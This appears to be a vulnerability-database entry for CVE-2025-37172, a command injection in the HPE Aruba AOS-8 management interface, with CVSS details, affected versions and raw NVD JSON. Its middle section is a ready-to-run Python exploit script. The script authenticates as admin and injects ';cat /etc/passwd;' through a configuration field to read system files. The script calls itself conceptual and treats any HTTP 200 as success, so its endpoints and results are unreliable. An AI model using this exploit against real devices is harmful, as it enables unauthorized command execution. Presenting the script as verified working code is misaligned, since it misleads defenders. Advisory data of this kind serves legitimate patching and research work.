Security Vulnerability Report
中文
CVE-2025-37172 CVSS 7.2 HIGH

CVE-2025-37172

Published: 2026-01-13 20:16:05
Last Modified: 2026-01-23 16:45:04

Description

Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
Aruba AOS-8 (all versions prior to security patch)
HPE Aruba Mobility Conductors running AOS-8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37172 PoC - HPE Aruba AOS-8 Command Injection # Note: This is a conceptual PoC for educational purposes only # Authorization required: Valid high-privilege credentials import requests import sys from urllib.parse import quote TARGET_URL = "https://<target-ip>:4343" USERNAME = "admin" PASSWORD = "admin_password" def exploit(target_url, username, password): """ Exploit CVE-2025-37172: Authenticated Command Injection in Aruba AOS-8 """ session = requests.Session() # Step 1: Authentication login_url = f"{target_url}/v2/login.cgi" login_data = { "username": username, "password": password } try: response = session.post(login_url, data=login_data, verify=False, timeout=30) if response.status_code != 200: print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Command Injection via web management interface # Malicious payload to execute arbitrary commands cmd_injection_url = f"{target_url}/v2/configuration.cgi" # Example: Read /etc/passwd file malicious_cmd = ";cat /etc/passwd;" payload = { "action": "save", "variable": quote(malicious_cmd), "object": "mgmt_users" } response = session.post(cmd_injection_url, data=payload, verify=False, timeout=30) if response.status_code == 200: print("[+] Command injection successful!") print("[*] Response:", response.text[:500]) return True else: print("[-] Exploitation failed") return False except requests.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target-ip>") sys.exit(1) target = sys.argv[1] exploit(f"https://{target}:4343", USERNAME, PASSWORD)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37172", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:05.217", "lastModified": "2026-01-23T16:45:03.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system."}, {"lang": "es", "value": "Vulnerabilidades de inyección de comandos autenticadas existen en la interfaz de gestión basada en web de los conductores de movilidad que ejecutan el sistema operativo AOS-8. La explotación exitosa podría permitir a un actor malicioso autenticado ejecutar comandos arbitrarios como un usuario privilegiado en el sistema operativo subyacente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.6.0.0", "versionEndExcluding": "8.10.0.21", "matchCriteriaId": "28EE6221-D715-48C4-B181-BD530080E706"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1", "matchCriteriaId": "1C7390DD-329B-44A3-9693-34211258DF37"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}